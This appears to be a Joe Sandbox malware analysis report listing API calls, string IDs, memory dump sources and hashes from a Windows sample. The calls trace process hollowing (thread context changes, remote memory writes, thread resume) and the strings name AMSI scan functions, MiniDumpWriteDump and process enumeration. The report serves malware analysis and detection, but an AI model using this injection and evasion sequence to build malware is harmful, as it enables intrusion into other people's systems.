                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0290AB7E
                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0290AB90
                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0290ABA2
                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0290ABB4
                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0290ABC6
                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0290ABD8
                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0290ABEA
                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0290ABFC
                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0290AC0E
                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0290AC20
                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0290AC32
                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0290AC44
                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0290AC56
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                          • API String ID: 667068680-597814768
                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 02908788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02908814
                                                          • GetThreadContext.KERNEL32(00000000,02977424,ScanString,029773A8,0290A93C,UacInitialize,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,UacInitialize,029773A8), ref: 02909602
                                                            • Part of subcall function 02907A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F
                                                            • Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
                                                          • SetThreadContext.KERNEL32(00000000,02977424,ScanBuffer,029773A8,0290A93C,ScanString,029773A8,0290A93C,Initialize,029773A8,0290A93C,00000000,-00000008,029774FC,00000004,02977500), ref: 0290A317
                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02977424,ScanBuffer,029773A8,0290A93C,ScanString,029773A8,0290A93C,Initialize,029773A8,0290A93C,00000000,-00000008,029774FC), ref: 0290A324
                                                            • Part of subcall function 0290894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                            • Part of subcall function 0290894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                            • Part of subcall function 0290894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                          Similarity
                                                          • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                          • API String ID: 2624078988-51457883
                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 02908788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02908814
                                                          • GetThreadContext.KERNEL32(00000000,02977424,ScanString,029773A8,0290A93C,UacInitialize,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,UacInitialize,029773A8), ref: 02909602
                                                            • Part of subcall function 02907A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F
                                                          Similarity
                                                          • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                          • API String ID: 4276370345-51457883
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5925
                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028F593C
                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 028F596C
                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F59D0
                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A06
                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A19
                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A2B
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000,0291E790), ref: 028F5A37
                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14,028F0000), ref: 028F5A6B
                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028F6C14), ref: 028F5A77
                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 028F5A99
                                                          Similarity
                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                          • API String ID: 3245196872-1565342463
                                                          APIs
                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5BE8
                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BF5
                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BFB
                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5C26
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C6D
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C7D
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5CA5
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5CB5
                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5CDB
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5CEB
                                                          Similarity
                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                          • API String ID: 1599918012-2375825460
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID:
                                                          • API String ID: 4168288129-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          APIs
                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 028F7FF5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1705453755-0
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,0291D106,00000000,0291D11E), ref: 028FB79A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Version
                                                          • String ID:
                                                          • API String ID: 1889659487-0
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,028FBE72,00000000,028FC08B,?,?,00000000,00000000), ref: 028FA823
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID:
                                                          • API String ID: 481472006-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                          • Instruction ID: b284b7ec0284c3d7a9ca55b45810c6a96755ae4b6891cb2d94b60c159e450391
                                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                          • Instruction Fuzzy Hash: B25159729003488BEB24CF69D99569EBBF8FB48318F24806BD419EB260D774A580CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                          • Instruction ID: bfee155b9f34f221f7dd01d4eda2dd5e92e23768705a51b899f8f204f6845913
                                                          • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                          • Instruction Fuzzy Hash: 3E4107759187458BC350CF29C58021AFBE5FFD8328F649A1EF889E3650D775E9828F82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          • Opcode ID: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                          • Instruction ID: 8fc05642c2717fd87c29d8b6f79da9ef6556eba3614a95ee0cb8648201c0d03c
                                                          • Opcode Fuzzy Hash: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                          • Instruction Fuzzy Hash: 6DE0BF31000208FFCF526F54DE48A993B7AEF44652F014464F9095A572CB35DD42DB44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c4eddc6a5d0cdfec55971e2787b996e507c32f56da4d0f735c0f191235488fd
                                                          • Instruction ID: 42a8bf880ddf2b80d96b76442f2ddb01a99c9f94f80d0bae9d038692bb6fa7c4
                                                          • Opcode Fuzzy Hash: 7c4eddc6a5d0cdfec55971e2787b996e507c32f56da4d0f735c0f191235488fd
                                                          • Instruction Fuzzy Hash: 3C324821D29F414DD7239A34C922335A24CAFB72C5F66D73BF81AB59A6FB28D1C34106
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                          • Instruction ID: 00ac9ab08656d00fa797d59c7282fef82877aff418a101a4b6ae9f6526e4a4b5
                                                          • Opcode Fuzzy Hash: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                          • Instruction Fuzzy Hash: 6732F1316087459BDF29CF2CC49076AB7EDBF84368F044A2DF8A58B281E775D945CB82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0536839ad9d50ddb588c0ac8460f4bf1c7ee3186167c97336a3805a21c2e7f34
                                                          • Instruction ID: 1ae6cfe16f3d09a4df40d380f7ac76f301420d9b011f1703139918d120d5f113
                                                          • Opcode Fuzzy Hash: 0536839ad9d50ddb588c0ac8460f4bf1c7ee3186167c97336a3805a21c2e7f34
                                                          • Instruction Fuzzy Hash: D5B1D77260430067EA04FB78DCB5DBE369BDFD2714F480A1DF846971D1EE659A08CE92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                          • Instruction ID: f6f851d0e5aa630a9dcd22d334642ccccab8a2def44488c550614c32ebd6763d
                                                          • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                          • Instruction Fuzzy Hash: DAB16A316106089FDB19CF28C58AB657BE1FF45369F29865CE8DACF2A1C335E981CB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                          • Instruction ID: 9f4dd4dd2a5cf3e5f2beed574008ef534bd56b4e966b044b78c04df46fdac9b9
                                                          • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                          • Instruction Fuzzy Hash: 4861BCB1A0071866DA3B5E288B987FE739FEF81709FC6091DE483DB2C0D751A942CB45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                          • Instruction ID: 25bf2414dfa992e9debeff9bb420921e57a9fc7e8341a069e0f3ef05103c527b
                                                          • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                          • Instruction Fuzzy Hash: FC61797120070996DA3B9B68CBD4BFE739DDF4A728FC60819E487EB280D711E94AC715
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
